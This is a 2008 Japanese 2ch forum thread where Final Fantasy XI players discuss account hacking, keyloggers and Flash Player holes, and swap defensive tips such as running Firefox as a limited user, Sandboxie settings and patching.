98 名前:既にその名前は使われています:2008/08/21(木) 14:27:38 ID:kWF0ObFx
コンドームで失敗って、そりゃ先走りのついた手でゴム装着とかまんこ触ったとかそういうんじゃねーの?

99 名前:既にその名前は使われています:2008/08/21(木) 15:08:57 ID:rVKnzXmb
散々既出の対策を講じたうえで、Webブラウザを制限ユーザーの権限で
実行するようにすると防御力がさらにアップ。
権限上昇の脆弱性を合わせて突かれなければ、それになりに効果がある。

Windows XP Pro+Firefoxでの大まかな手順は次のとおり。

1. 制限ユーザーを作る。runasコマンドで使うのでパスワードの設定が必要
2. こんな↓内容でFirefox起動用のバッチファイルを作る
  runas /user:ponyo "C:\Program Files\Mozilla Firefox\firefox.exe"
3. administrator権限を持つユーザーでfirefox.exeを起動できないように
  ファイルのパーミッションを変更する
4. 以後、Firefoxは作成したバッチファイルで起動する(パスワードの入力が要る)

Firefoxはそのままでは多重起動できないので、先にadmin権限付きユーザーで
動作させているとadmin権限のままになることに注意。これを防ぐのが手順3。
Firefoxのプロファイル移行は各自でなんとかしてちょうだい。

以上、基礎固めが済んでいて、自分でそれなりにできる人向けのFYIでした。

100 名前:既にその名前は使われています:2008/08/21(木) 15:21:52 ID:6G1KlL1g
確かに軽い とか言われてもさぁ、記事広告だから……

分かるよね? 記事広告

101 名前:既にその名前は使われています:2008/08/21(木) 15:29:51 ID:7O6YJaKq
>>98
なるほど・・・射精時の勢い無くとも頑張って卵子までたどり着いてしまうのか。

>>99
ttp://e-words.jp/w/FYI.html

102 名前:既にその名前は使われています:2008/08/21(木) 15:49:24 ID:OWm1pYQa
>>99
IEのReduced Permissionsと同じですね

103 名前:既にその名前は使われています:2008/08/21(木) 16:11:10 ID:OWm1pYQa
>>99のバッチを実行した場合、管理者権限でFirefoxに入れた
アドオンは使えませんので、制限ユーザー用に入れ直す必要が
ありますから注意してください

104 名前:既にその名前は使われています:2008/08/21(木) 16:22:17 ID:LYxFa8jD
>>103
プロファイルからプロファイルへコピーすればいいだけじゃね?

105 名前:既にその名前は使われています:2008/08/21(木) 16:58:06 ID:NFv36xUX
KernaeghDrv.dllさんいるとしたらレジストリのどこにますか?

106 名前:既にその名前は使われています:2008/08/21(木) 17:20:35 ID:SErqpzPh
なぜコンドームの話なのか( ゚Д゚ )

107 名前:既にその名前は使われています:2008/08/21(木) 17:25:04 ID:wP+BNUdU
>>106
>>86

108 名前:既にその名前は使われています:2008/08/21(木) 17:37:59 ID:HJ9x7Wpz
なんかネ実のスレかたっぱしからdatオチしてるな保守


109 名前:FFXI(仮):2008/08/21(木) 17:57:23 ID:/n6Ewmg5
このブログは下記の理由などにより凍結されています。
規約上の違反があった
多数のユーザーに迷惑をかける行為を行った。

\(^o^)/
今までご利用ありがとうございました。

110 名前:既にその名前は使われています:2008/08/21(木) 17:59:36 ID:rVKnzXmb
えええええぇぇぇぇ!
FC2酷い

お疲れさまでした>FFもやるひと

111 名前:既にその名前は使われています:2008/08/21(木) 18:26:12 ID:z2BJLh4t
>>109
嘘だろ承太郎!?
特亜が抗議メールボムでもやったんかいな

112 名前:既にその名前は使われています:2008/08/21(木) 18:30:15 ID:kMiPnoNc
ノートン2009か、まっさらなXP環境にインスコしようと思ったが
ダブルクリックしたあと反応がなくなってそれっきりだったな

重いとか軽いとか検出力とか、そんなレベルの問題じゃなかったぜ

113 名前:既にその名前は使われています:2008/08/21(木) 18:36:47 ID:HJ9x7Wpz
ノートンは市販ウィルス。
インスコしたらアップデートチェックプログラムなどアンインスコ不能。
ムリにデータ消そうとするとOS破壊。

おまえら気をつけろ。

114 名前:既にその名前は使われています:2008/08/21(木) 18:40:04 ID:z2BJLh4t
そうそう、スレ保持数が300まで引き下げられたらしいから、またこまめな保守が必要になるかも。
200超えてたら無条件で上げてくだされ

115 名前:既にその名前は使われています:2008/08/21(木) 18:51:31 ID:E1s19ao7
FC2がカスだって事は、以前のテンプレ改竄の対応具合と、それに関する報告が
皆無に等しい事から既に分かっていた事…

116 名前:既にその名前は使われています:2008/08/21(木) 19:05:35 ID:4AyUqK3O
垢ハックされてビックリした事は、
情報抜き取られて、抜き取られた情報「だけで」、鯖移動申請通過しちゃった事だな。
業者の鯖移動申請の時に防げたら、同じ鯖内でアイテムロストだけで済んでた。
せめて鯖移動は電話・書類のみ受付で、その時に必要な合言葉作っておいて(入会の時に書類で■に送る)、
電話での合言葉で確認でもしないと、被害減らないだろうな。
そもそも鯖移動なんて業者くらいしかやらないでしょ。
!!もしかして鯖移動を黙認移動代ウマーしてるのか?■eはw「鯖移動代はご負担になります」とか言ってたしw

あと、サポセンの人によってやる気の無さとかが全然違うのなw
サポセンの中に業者と手を組んでる奴絶対居ると思うぞww

117 名前:既にその名前は使われています:2008/08/21(木) 19:10:06 ID:sC6uR2UE
>>116みたいなレス見るとなんだかな〜と


118 名前:既にその名前は使われています:2008/08/21(木) 19:10:17 ID:GILFMCT1
>>116
そりゃID/PASS抜かれてるんだからな。
ID/PASSの重要性を学ぶいい機会だったじゃん、やったなw

119 名前:既にその名前は使われています:2008/08/21(木) 19:11:27 ID:0F0kYNw4
>>115
あそこはユーザー(製作者)向けの稀有なサービスだから製作者としてはいじりやすいんだがね
ただしそのいじりやすさ故に脆弱性山ほどというのは最初から目に見えていた
製作者が大方いじれるように解放されてるってことはその分悪用も可能だしね

>>116
ログインすると重要情報も閲覧できるからね
ネットのみだと画面の向こうにいるのがのび太くん(本当の所有者)なのかジャイアン(業者)なのか判断つかない
鯖移動を郵送必須にすると不精なユーザーが面倒くさがりそうだから難しい
この辺りは固定回線を持たないレンタルビデオ屋の会員に似てる

120 名前:既にその名前は使われています:2008/08/21(木) 19:15:11 ID:4AyUqK3O
いや、PCだとパスは、遅かれ早かれ抜かれるってw
だから、PC上のパスだけじゃなく、リアルでもパスが欲しいって事。
PCのパスと、リアルでのパス両方で、鯖移動とかできるようにして欲しい。

121 名前:既にその名前は使われています:2008/08/21(木) 19:17:41 ID:GILFMCT1
>>120
おまいが抜かれたときの環境および状況と垢パスぬきの手法をkwsk

たしかに鯖移動なんかはもう一段階なんか手順ほしいとは俺も思うw

122 名前:既にその名前は使われています:2008/08/21(木) 19:21:36 ID:0F0kYNw4
>>120-121
二段階方式にして
初期パス→重要設定で初期パス入力→ランダムでパス吐き出す(ログイン)
で、重要設定だけ初期パスにするって感じか?

仮に郵送セットとなると
買う→郵送→返却→やっとこさスタート
となってゲームがすぐやれないネトゲになるのか

123 名前:既にその名前は使われています:2008/08/21(木) 19:24:08 ID:gsvF18XI
POLで暗号打ってからソフトキーボーで毎回パス手打ちして
パスの保存先はPCにFFやる時に付けるUSBメモリの中
これでも抜かれることってあるのでしょうか?
詳しい方のご意見を伺いたいです




124 名前:既にその名前は使われています:2008/08/21(木) 19:24:54 ID:sC6uR2UE
リネみたいにセキュカード発行するだけでかなり違ってくるんだがな
■がやらないんだから、現状出来るのは危ないサイトにいかない
怪しいところにはいかない、セキュは万全にするぐらいしかない。

それがいやなら箱かPS2買ってそっちでやるかFF引退だな

125 名前:既にその名前は使われています:2008/08/21(木) 19:29:09 ID:0F0kYNw4
>>123
キーロガーさんは暗号もソフトキーボーの入力情報も記録すると思う
■eはゲーム機でやった方がいいのかも

126 名前:既にその名前は使われています:2008/08/21(木) 19:30:59 ID:E1s19ao7
>>119
自由度に関しては同意。それに起因する問題はトレードオフの関係だししょうがない部分も多い。

ただ、あそこの問題はそこではなく、セキュリティの問題に限らず、問題発生時の管理側の
対応がダメ過ぎる事。セキュリティの問題は対応をきちんと行った上で出来る限り報告を
行うことがこの業界の常識なのにそれを行ってない。

FFXI(仮)さんの件も、おそらく内容を精査せず管理側の自動巡回プログラムにHitしたから
自動的にdeleteなんて感じなのではないだろうか。FC2関連スレを流し読みするとその程度の
管理レベルとしか思えない。
無料サービス大手でユーザーを膨大に抱えている関係上やむをえない部分はあるんだろうけど
しかし、最低限はきちんとしてもらいたいものだ。



127 名前:既にその名前は使われています:2008/08/21(木) 19:32:21 ID:4AyUqK3O
ネトゲはPCではしてはならない事を学んだわw
もうやらないからいいけどw

鯖移動みたいに、限定アイテムも同じように買えてたら、
もっと被害酷かったと思うとぞっとするw

128 名前:既にその名前は使われています:2008/08/21(木) 19:38:20 ID:gsvF18XI
>>125 ありがとうございます
そろそろPCのセカンド機購入しようと思っていたので
FF専用機にしてネットサーフィンしないようにします


129 名前:既にその名前は使われています:2008/08/21(木) 20:27:58 ID:OWm1pYQa
>>104
Profileからコピーしてもいけるみたいですね
まぁ素直にDLしたほうが確実だとは思いますけど
Profileコピーで動作に不具合が出ないとも限りません

130 名前:既にその名前は使われています:2008/08/21(木) 20:35:59 ID:e9zv+h5q
>>109
なんで消されたの?
業者の危険URLを報告してくれてた人だよね?

131 名前:既にその名前は使われています:2008/08/21(木) 20:48:53 ID:4HUHnM2y
W32.SillyFDC
W32.Gammima.AG
この二つを発見してノートンが駆除したのですが
W32.Gammima.AGは毎日駆除報告が出ます。
根元から駆除してないんだと思うのですがどなたか根元を駆除する方法わかりますでしょうか?

132 名前:既にその名前は使われています:2008/08/21(木) 20:53:55 ID:H/SUFd2e
消しても沸いてくるってことはシステムの復元ポイント消せばいんじゃね?
それとタイミングよく詳しい人がいるとも限らないから
ググッて調べた方が確実にわかりやすく対処できるよ。

133 名前:既にその名前は使われています:2008/08/21(木) 21:00:21 ID:TegKWTZq
どうやらスレ保持数が300に減ったらしいので注意

巻き戻し報告スレは落ちた
業者通報スレは落ちたけど立て直してた
ttp://changi.2ch.net/test/read.cgi/ogame/1219310739/l50



134 名前:既にその名前は使われています:2008/08/21(木) 21:00:31 ID:nyYMqEOB
PS2でも ハック被害者でたんだが、PS2でもハックされるんだなー

135 名前:既にその名前は使われています:2008/08/21(木) 21:03:23 ID:OWm1pYQa
>>131
シマンテック製品をお使いでしたら

シマンテック
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-082706-1742-99&tabid=3

このあたりをご覧になられてはどうでしょう

136 名前:既にその名前は使われています:2008/08/21(木) 21:03:55 ID:TegKWTZq
>>134
LSコミュだのフレンドリストプラスだの
その手のヤツでPCパス入力してりゃやられ申す

137 名前:既にその名前は使われています:2008/08/21(木) 21:07:27 ID:nyYMqEOB
ネ実や公式って比較的安全って聞いたんだけど
ウイルス仕組まれたことってある?

138 名前:既にその名前は使われています:2008/08/21(木) 21:11:16 ID:08Lj3R4k
公式はともかく、ネ実が安全って考えがすごい


139 名前:既にその名前は使われています:2008/08/21(木) 21:12:21 ID:2m50hsnB
ノートン誤作動騒動くらいしか知らないなぁ
でもあれは2chに限ったことでもないし
専用ブラウザで見ているなら広告に何か変な物体が入っていたとしても見なくて済むし

140 名前:既にその名前は使われています:2008/08/21(木) 21:13:29 ID:CslizGqH
専ブラで画像を自動読み込みにしてたらキケンキケンです

141 名前:既にその名前は使われています:2008/08/21(木) 21:13:52 ID:HJ9x7Wpz
ネ実は業者とのバトル最前線だな

142 名前:既にその名前は使われています:2008/08/21(木) 21:15:49 ID:nyYMqEOB
専用ブラウザはしてなくて、普通に見てる


143 名前:既にその名前は使われています:2008/08/21(木) 21:17:23 ID:nyYMqEOB
途中でおくっちゃった・・。
専用ブラウザの法が安全ですか?

144 名前:既にその名前は使われています:2008/08/21(木) 21:21:33 ID:TegKWTZq
>>137
■e公式はまだクラックは受けたことは無い・・・ハズだけど攻撃は常に受けてるんでねーかい。
正規サイトの改竄はここ最近のネット上のセキュリティ関係で一番問題になってる&流行ってる手口だから、
さっき安全だったからといって今安全だとは保障できない。
なんせウィルスバスターのトレンドマイクロ公式がやられてアカハクウィルス仕込まれる時代だしのう。

ちなみにLSコミュとか経由のアカハクは別に「公式にウィルスを仕組む」必要は無いよ。
その手のヤツにログインする時に入力されるID・パスを盗むトロイをどこかで感染させとけばいいわけだし。
自動ログインにしとけばクッキーに保存されちまうんだったっけか。>ID・パス

145 名前:既にその名前は使われています:2008/08/21(木) 21:27:02 ID:nyYMqEOB
>>144
ありがとうございます。


146 名前:既にその名前は使われています:2008/08/21(木) 21:38:39 ID:5dVzE/do
>>145
短文で返してるけど、理解したの?
一行でどう理解したか話してみ?

147 名前:既にその名前は使われています:2008/08/21(木) 21:40:04 ID:gIi5Avoi
>>146
キモいから帰ってくれない?

148 名前:既にその名前は使われています:2008/08/21(木) 21:47:56 ID:H/SUFd2e
だからなんで煽るのかね。

149 名前:既にその名前は使われています:2008/08/21(木) 21:52:01 ID:nyYMqEOB
>>146
>>144に対しては、公式だからといって(さっき安全だったから)
必ずしも安全ではないって事ですよね。
LSコミュに至っては入力された際に トロイとか
仕組まれてたら抜かれる。
言葉そのまま受け取りましたが・・・。




150 名前:既にその名前は使われています:2008/08/21(木) 22:00:23 ID:9yFMLqFL
フラッシュメモリの内容を覗くウィルスもあるから、それと垢ハックのウィルスと応用されると
フラッシュメモリにパスを保存するのも将来的には危険かもしれない。

151 名前:既にその名前は使われています:2008/08/21(木) 22:11:15 ID:4HUHnM2y
ウィルス駆除中なのですが
XPでシステムの復元を無効にするのチェックが灰色になってて
チェック不可能なのですがどなたか理由分かりますでしょうか?

152 名前:既にその名前は使われています:2008/08/21(木) 22:25:37 ID:/n6Ewmg5
>>130
こっちが聞きたいですわ。
一応問い合わせ送ったけど、問い合わせフォームに
「ブログ凍結の理由については回答致しません。ご了承下さい。」
とあるので無理でしょうね。

153 名前:既にその名前は使われています:2008/08/21(木) 22:28:40 ID:H/SUFd2e
解凍いたしませんってなんでだ?
あちらで何かやってしまったってことはないかな?

154 名前:既にその名前は使われています:2008/08/21(木) 22:28:44 ID:5dVzE/do
>>149
だいたい合ってるかな…
模範解答は
「ネットに繋げる限りどこも安全じゃない」
と、一文で済む。
ただ、これが非常に大事。
そもそも、ネットが安全なんて何処も書いて無いのに、余りにも無法に繋げる馬鹿ばかりだからなー
(今も上で「FF11専用パソコンにします」って言う馬鹿いたが、臭い物に蓋をする行動しかしてない…こういう人間は何言っても無駄だけどな)
今の状況は、明日スカイネットで人類滅亡オワタだからなのに、
それに無頓着な人間が余りにも多過ぎwwwwwだしな。
(でなかったら、ここにスキルのある人間が集まって、こんなにもスレッド伸びないて)

その危機感を感じ取れたかどうか?それを確認したかったから聞いたまでだから。
しっかりと感じ取ってくれよな

155 名前:既にその名前は使われています:2008/08/21(木) 22:35:52 ID:OWm1pYQa
>>151
管理者権限でログインしてないか、なにかほかのソフトが復元の項目に
ロックかけてるか・・・くらいしか思いつきません

156 名前:既にその名前は使われています:2008/08/21(木) 22:36:24 ID:IC3zLpW7
>>154
はい。重々承知してるのですが
こうやって書き込みしてる間も危険あるって事ですよね・・。
パソコンとか詳しい知り合いいないので、
ここの皆様が頼りなのが現状なんですよね・・・。
ここで感染したら本末転倒なのよねorz
くどいようですが スレを見たり書いたりするのも
危険って思っておいたほうがいいですよね?

157 名前:既にその名前は使われています:2008/08/21(木) 22:36:56 ID:jsRP7ikA
>>152
ブログで危険なURLを表示していたなら意図はどうあれ規約違反?

158 名前:既にその名前は使われています:2008/08/21(木) 22:37:32 ID:5dVzE/do
それにしても…>>147みたいな文章で中二病みたいな奴(いくらでも書き換えられる文章なのに、こいつ上から目線でうざいとか判断する馬鹿)ふえたなー
まあ、慣れてるからいいけど。

>>150
フラッシュもだけど、USB接続からのウイルスも未だ活動中なのも忘れちゃいけないぜ?
企業販売してる物からの(これこそ馬鹿げてるが)感染もまだまだ有りそうで油断出来ないしな。

159 名前:既にその名前は使われています:2008/08/21(木) 22:39:43 ID:OWm1pYQa
>>154
ウィルス対策ソフトを入れていれば感染しないと思ってる人が多すぎなのも
なんとかしたいですね

160 名前:既にその名前は使われています:2008/08/21(木) 22:40:40 ID:jsRP7ikA
>>156
ここは有意義だけど
危険度1〜5とすればネ実は危険度8

161 名前:既にその名前は使われています:2008/08/21(木) 22:42:08 ID:68H3kTn0
セカンド機「を」FF専用機にする。って意味じゃないの?

162 名前:既にその名前は使われています:2008/08/21(木) 22:43:49 ID:T9Vvz5xY
報告スレ落ちた?

163 名前:既にその名前は使われています:2008/08/21(木) 22:50:23 ID:/n6Ewmg5
落ちたね。なんかスレ保持数減ったの?

164 名前:既にその名前は使われています:2008/08/21(木) 22:52:05 ID:TegKWTZq
急に300になったぽい
理由は不明

保守しないと2時間くらいで落ちるペースなので気をつけていきまっしょい

165 名前:既にその名前は使われています:2008/08/21(木) 23:01:08 ID:T9Vvz5xY
報告スレの報告はっとくかぁ・・・

166 名前:既にその名前は使われています:2008/08/21(木) 23:01:59 ID:T9Vvz5xY
>>132【6/24投函→7/12復元】2週間と5日
>>667【6/27投函→7/17復元】
>>29 【6/27ハック→同日投函→7/28復活】4週間と4日
>>9 【7/02投函→7/25復活】3週間と3日
>>280【7/4投函?→8/5復帰】4週間と4日
>>5 【7/05投函→7/29復帰】3週間と4日
>>211【7/05投函→8/04復帰】4週間と3日
>>221【7/06投函→7/31復帰】3週間と4日
>>194【7/07投函→8/04復帰】4週間と1日
>>213【7/07投函→8/04復帰】4週間と1日
>>370【7/08投函→8/05復帰】4週間と1日
>>285【7/08投函→8/06復帰】4週間と2日
>>305【7/08投函→8/06復帰】4週間と2日
>>256【7/09投函→8/06復帰】4週間と1日
>>299【7/09投函→8/06復帰】4週間と1日
>>357【7/09投函→8/08復帰】4週間と1日

167 名前:既にその名前は使われています:2008/08/21(木) 23:02:30 ID:T9Vvz5xY
>>271【7/10投函→8/06復帰】4週間
>>356【7/11投函→8/08復帰】4週間と1日
>>368【7/11投函→8/08復帰】4週間と1日
>>813【7/11投函→8/13復帰】4週間と6日
>>732【7/13投函→8/12復帰】4週間と2日
>>861【7/11投函→8/14復帰】4週間と6日
>>869【7/14投函→8/14復帰】4週間と3日
>>871【7/05投函→8/14復帰】5週間と5日
>>876【7/10投函→8/14復帰】5週間
>>849【7/11投函→8/14復帰】4週間と6日
>>933【7/10投函→8/14復帰】5週間
>>162【7/06投函→8/14復帰】5週間と4日
>>971【7/15投函→8/15復帰】4週間と3日
>>14 【7/22投函→8/15復帰】3週間と3日


168 名前:既にその名前は使われています:2008/08/21(木) 23:03:01 ID:T9Vvz5xY
>>33 【7/13投函→8/16復帰】4週間と2日
>>30 【7/15凍結→8/16復帰】4週間と4日
>>26 【7/11投函→8/17復帰】5週間と2日
>>39 【7/11投函→8/17復帰】5週間と2日
>>23 【7/15凍結→8/17復帰】4週間と5日
>>52 【7/24投函→8/17復帰】3週間と3日
>>71 【7/11投函→8/18復帰】5週間と3日
>>58 【7/14投函→8/18復帰】5週間
>>62 【7/25投函→8/18復帰】3週間と3日
>>97 【7/11投函→8/19復帰】5週間と4日
>>104【7/14投函→8/19復帰】5週間と1日
>>101【7/20投函→8/19復帰】4週間と2日
>>149【7/08投函→8/20復帰】6週間と1日
>>159【7/17凍結→8/20復帰】4週間と6日
>>75 【7/25投函→8/20復帰】3週間と5日

169 名前:既にその名前は使われています:2008/08/21(木) 23:12:11 ID:OWm1pYQa
ほんの数分で100まで落ちる

170 名前:既にその名前は使われています:2008/08/21(木) 23:22:17 ID:NAtrZyKl
メインPCをFF専用マシーンにして5年前に買ったUS版Winのノートでネット見ているのだが
危険と思われるサイトをわざと見に行っても、全然感染していない。
ウィルスもJP版とUS版は別なのかな?スキャンはカスペルスキー使用。

171 名前:既にその名前は使われています:2008/08/21(木) 23:25:51 ID:IC3zLpW7
>>170
感染してないと なぜ分かるのですか?
スキャンでも発見出来ないウイルスもあると聞いたことあるのですが・・。

172 名前:既にその名前は使われています:2008/08/21(木) 23:30:30 ID:OWm1pYQa
>>170
国別ウィルスって聞いたことないですw

173 名前:既にその名前は使われています:2008/08/21(木) 23:45:52 ID:/n6Ewmg5
>>172
スクリプトではねる奴は見たことが。
zh(中国語)を除外するやつw

174 名前:既にその名前は使われています:2008/08/21(木) 23:49:30 ID:fuVvpZoZ
うちの鯖のブログリンク集、fc2でJavaONにしてないと見られないデザインに改悪されてた・・・。
ブログほいほい見に行くのさえ危険なご時勢だってのはわかってるが・・・。

175 名前:既にその名前は使われています:2008/08/21(木) 23:59:36 ID:NAtrZyKl
>171
発見できないウィルスが聞いたことあるだと分からないので教えてもらえます?
発見できないウィルスっていうのは7月頭に言われてた話しなんですが。

あまりNAのユーザーでここまでハックされたと騒ぐ人がいなかったもので
NAのフォーラム見てもあまり報告なかったのでどうなのかなって。

176 名前:既にその名前は使われています:2008/08/22(金) 00:11:50 ID:LGCZkWhc
1.新種
2.ウィルス対策ソフトに定義がない
3.ステルス型
4.自己消滅型

これくらいかな、発見できないのは

177 名前:既にその名前は使われています:2008/08/22(金) 00:12:25 ID:gYw/jHGU
>>175
英語わからないだけだろw
すげー騒がれてるが。

178 名前:既にその名前は使われています:2008/08/22(金) 00:15:01 ID:LGCZkWhc
あと、言葉のあやかもしれませんけど「発見できない」と
「発見されない」とは違うような気もします

179 名前:既にその名前は使われています:2008/08/22(金) 00:16:20 ID:/516O7AW
>>176
質問。4の自己消滅型ってのは どういったものでしょうか?


180 名前:既にその名前は使われています:2008/08/22(金) 00:18:19 ID:7wm8h2pd
増殖等を行わず、目的のIDパスを送信後、自分から消えるタイプじゃね

181 名前:既にその名前は使われています:2008/08/22(金) 00:19:59 ID:/516O7AW
言葉足りずかもなので、連続カキコ失礼します。
自己消滅 言葉そのままやん!とか突っ込まれそうなので・・・。
目的を終えるとor一定期間で消滅
って感じですか?


182 名前:既にその名前は使われています:2008/08/22(金) 00:20:50 ID:7wm8h2pd
そのたうり

183 名前:既にその名前は使われています:2008/08/22(金) 00:21:00 ID:/516O7AW
>>180
なるほど・・。ご返答ありがとうございます

184 名前:既にその名前は使われています:2008/08/22(金) 00:39:14 ID:Tr0qvoxm
消滅するタイプは厄介なんだよな、仮にパス抜きウイルスで消滅された場合、
垢ハックされた理由を特定できなくなるから被害者もサポートも疲弊するし、
被害者のPCから検体が手に入らないから対策ソフトの定義作成も遅れやすい

185 名前:既にその名前は使われています:2008/08/22(金) 00:44:22 ID:/516O7AW
ハック後、ソフトやオンラインスキャンしたのですが
ウイルス出なかった。これって消滅型濃厚ですか?


186 名前:既にその名前は使われています:2008/08/22(金) 00:47:34 ID:/Vm5Eqzh
検知できてないとか他原因の可能性も。

消滅型ってかなりマイナーじゃないかな。

187 名前:既にその名前は使われています:2008/08/22(金) 00:51:13 ID:/516O7AW
そうですか・・。
一応 リカバリーしたんですが怖いですね・・。


188 名前:既にその名前は使われています:2008/08/22(金) 00:53:09 ID:yAx5BPB6
>>187
オンランスキャンっていうとカスペさん?


189 名前:既にその名前は使われています:2008/08/22(金) 00:56:11 ID:bxZId0qP
また、XREA系サイトの改竄を始めてるぽいです。
ちょっと、巡回してきます。

190 名前:既にその名前は使われています:2008/08/22(金) 00:58:12 ID:byO4lTZ3
なんの不具合か分からんが、最近パソコンを立ち上げた直後のIMEがおかしい。

特にPC起動 → POL → ログイン → チャットするときに、文字入力するとすっごい処理落ちする。

カスペ、バスター2008の全スキャンしてもなにも異常なし。 不気味だぜ

191 名前:既にその名前は使われています:2008/08/22(金) 00:58:16 ID:/516O7AW
>>188
なんだっけ・・。忘れましたf^_^;


192 名前:既にその名前は使われています:2008/08/22(金) 01:02:17 ID:XmNdjQpU
俺はカスペ入れてからチャット意外でもエンターキー押すと重くなるな。

193 名前:既にその名前は使われています:2008/08/22(金) 01:07:49 ID:y8PIVH2Z
忘れたってアンタ
それ振込み詐欺の偽オンラインスキャンじゃないだろうなw

194 名前:既にその名前は使われています:2008/08/22(金) 01:08:44 ID:rE0/E4WD
さすがに釣りだろ

195 名前:既にその名前は使われています:2008/08/22(金) 01:10:29 ID:udtgJW3c
>>76
>>77
レスありがとうございます。
ちょっと重くなったように感じるけど、問題なく使えてます。
ぐぐってみたけどRedirect Removerも入れておくとよさそうですね〜
どこに何があるやらわからない状況だし・・・

196 名前:既にその名前は使われています:2008/08/22(金) 01:11:10 ID:/516O7AW
度々すみません!
過去にスレの中に たまに「パス抜かれた;;」
って見かけた事あるんですが、これって
スレ中のアドに行った事によりって事ですよね?
この場合 覗いちゃったらアウトって事ですか?


197 名前:既にその名前は使われています:2008/08/22(金) 01:12:45 ID:chWXDGOj
報告スレ落ちてたので、こちらで。
本日復旧しました。

7/15 垢ファック
7/16 資料送付
垢凍結は気づいたらされてたのでわかりません。

1ヶ月ちょいくらいかな?
データは2日前くらいに戻されてましたとさ。


198 名前:既にその名前は使われています:2008/08/22(金) 01:13:19 ID:LGCZkWhc
>>196
POLパスを抜かれたっていうことだと思いますよ
まぁ危険URLがスレに張られていたことはありますけど、だいたいそういう
場合はそのURLの下に注意が入ってましたし

199 名前:既にその名前は使われています:2008/08/22(金) 01:14:10 ID:XmNdjQpU
いやー空気嫁としかw ただのリンクの場合もあるが大体はアウチじゃん?

200 名前:既にその名前は使われています:2008/08/22(金) 01:16:00 ID:LGCZkWhc
>>196
もちろんこのスレでも、紹介なり張られているURLの安全が保障されて
いるわけではありませんから、トップにも書きましたけどURLを踏むのは
自己責任ですけどね

201 名前:既にその名前は使われています:2008/08/22(金) 01:16:00 ID:/516O7AW
>>193
のーとん、そーどねくすと?カスペ
のだったと思います。どれか忘れただけで・・。
多分 それはないと思います。

202 名前:既にその名前は使われています:2008/08/22(金) 01:19:47 ID:/516O7AW
>>198>>199>>200
ありがとうございます!
知識なくて余計な事するな ですね・・。
二度と踏まないようにしまs・・・!
多分それが原因だ;;


203 名前:既にその名前は使われています:2008/08/22(金) 01:34:12 ID:XmNdjQpU
>>202
クリーンインスコした?ハックされて何もせず
GMチャットしちゃってたなら又やられるかもよ?

204 名前:202:2008/08/22(金) 01:38:38 ID:BSgy5kP1
>>203
はい、クリーンインスコってリカバリ(買ったときの状態に戻す)
ですよね?やりました。


205 名前:既にその名前は使われています:2008/08/22(金) 01:41:19 ID:rE0/E4WD
クリーンインスコした後
・速攻でWindowsUpdate。ServicePackとIEは最優先。
・続いてカカっとFlashPlayerの更新
しないとまたやられるよ。

206 名前:既にその名前は使われています:2008/08/22(金) 01:48:18 ID:BSgy5kP1
>>205
WindowsUpdate○→ServicePack は○
        ↑(インストールですよね?)
FlashPlayerって何でしょうか・・・?
一応 説明書どうりして、セキュリティも速攻いれました。


207 名前:既にその名前は使われています:2008/08/22(金) 01:53:36 ID:MNwT8q7h
そうたろうwが今入院してる病院で心臓手術を受けた子供の
同じ様な募金サイトはここまで詳細に会計報告できてるんだよな〜
これが詐欺かどうかは置いとくとして。

これがそうたろうwには出来ないって事は有り得ないんだけどね。

ttp://www.fight-kouichi.com/chukan.html

208 名前:既にその名前は使われています:2008/08/22(金) 01:54:08 ID:MNwT8q7h
ぎゃーw
超スレチすまんwwww

209 名前:既にその名前は使われています:2008/08/22(金) 02:10:21 ID:gYw/jHGU
しぬしぬ詐欺は他でやれw

210 名前:既にその名前は使われています:2008/08/22(金) 02:17:06 ID:LGCZkWhc
ものすごく不謹慎な気がしますが、受けちゃいました・・・w

211 名前:既にその名前は使われています:2008/08/22(金) 02:18:05 ID:uFS/wjJ7
入院費1日100万の子のやつかw

212 名前:既にその名前は使われています:2008/08/22(金) 02:18:22 ID:EewF4yy2
今北区。

>>206

WindowsUpdateで現在リリースされているパッチを全部あてること。
また、更新がなされることと自動通知または自動インストールされることを確認することね。
ServicePackはSP3はちょっと環境によってはクラッシュしたりするからなんともいえないけど、
できれば最新を適用しておいたほうが望ましい。

で、FlashPlayerだけど。ここが今回の業者が使ってきた穴なわけで。
脆弱性もちのバージョンであれば、クリンスコしたとしても穴が塞がってないわけだから、また食わせられる危険性があるわけ。
なので。
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
ここにいってバージョンを確認して9.0.124.0より古いもので合った場合は、最新のFlashPlayerに更新する必要があるのね。
詳しくは>>5あたりにかいてるw

213 名前:既にその名前は使われています:2008/08/22(金) 02:25:32 ID:tKdpwKTK
>>196
なにかURLが貼られたら、ぱすぬかれた;;って書くのは、
ぬるぽ→ガッ みたいなもんです。お約束です。


214 名前:206:2008/08/22(金) 02:34:35 ID:A1sU3tG3
>>212
出来る限りのはやってきました。
後、ウイルスってCドライブDドライブは関係ないですよね?
FFをDドライブに入れてたのですが、リカバリではDドライブ初期化できないっぽいので・・・。



215 名前:既にその名前は使われています:2008/08/22(金) 02:34:41 ID:HIlzZ0is
>>213
どちらかといえばURLを何も考えずにホイホイ踏むなよという訓戒でもある

216 名前:206:2008/08/22(金) 02:40:32 ID:A1sU3tG3
>>213>>215
そ、そうですよね・・。

217 名前:既にその名前は使われています:2008/08/22(金) 02:44:52 ID:rE0/E4WD
>FlashPlayerって何でしょうか・・・?
ヽ(´ー`)ノ

218 名前:既にその名前は使われています:2008/08/22(金) 02:46:20 ID:EewF4yy2
スレでも度々話題に出てるSandBoxieだけど。
FF11をインスコしたPCでブラウザだけを砂箱化して実行するという前提での設定を以下に。

サンドボックス DefaultBox右クリック>サンドボックスの設定【S】で設定窓表示
・回復>クイックリカバリ
 ここは各自SandBoxieを理解するまでデフォルトで登録されているものも削除しておいたほうがいいと思う。
 よって3つ削除。
・回復>直接リカバリ
 同上の理由で、「直接リカバリ機能を有効にする」のチェックを外す
・削除>実行
 同上の理由で、「サンドボックスの内容を自動的に削除」のチェックを入れる
・リソースアクセス>インターネットアクセス
 これは、ブラウザを1種類しか使ってない環境であれば、そのブラウザを登録しても良いと思う。
・リソースアクセス>ファイルアクセス>アクセスブロック
 ほにゃらら(POLがインスコされてるドライブ):\Program Files\PlayOnline\ 追加。
・リソースアクセス>レジストリアクセス>アクセスブロック
 HKEY_LOCAL_MACHINE\software\PlayOnline 追加。

219 名前:既にその名前は使われています:2008/08/22(金) 02:46:52 ID:OFJe50GY
>>170
直ぐにハックされると思ったら大間違い。
忘れた頃にハックされると予想。

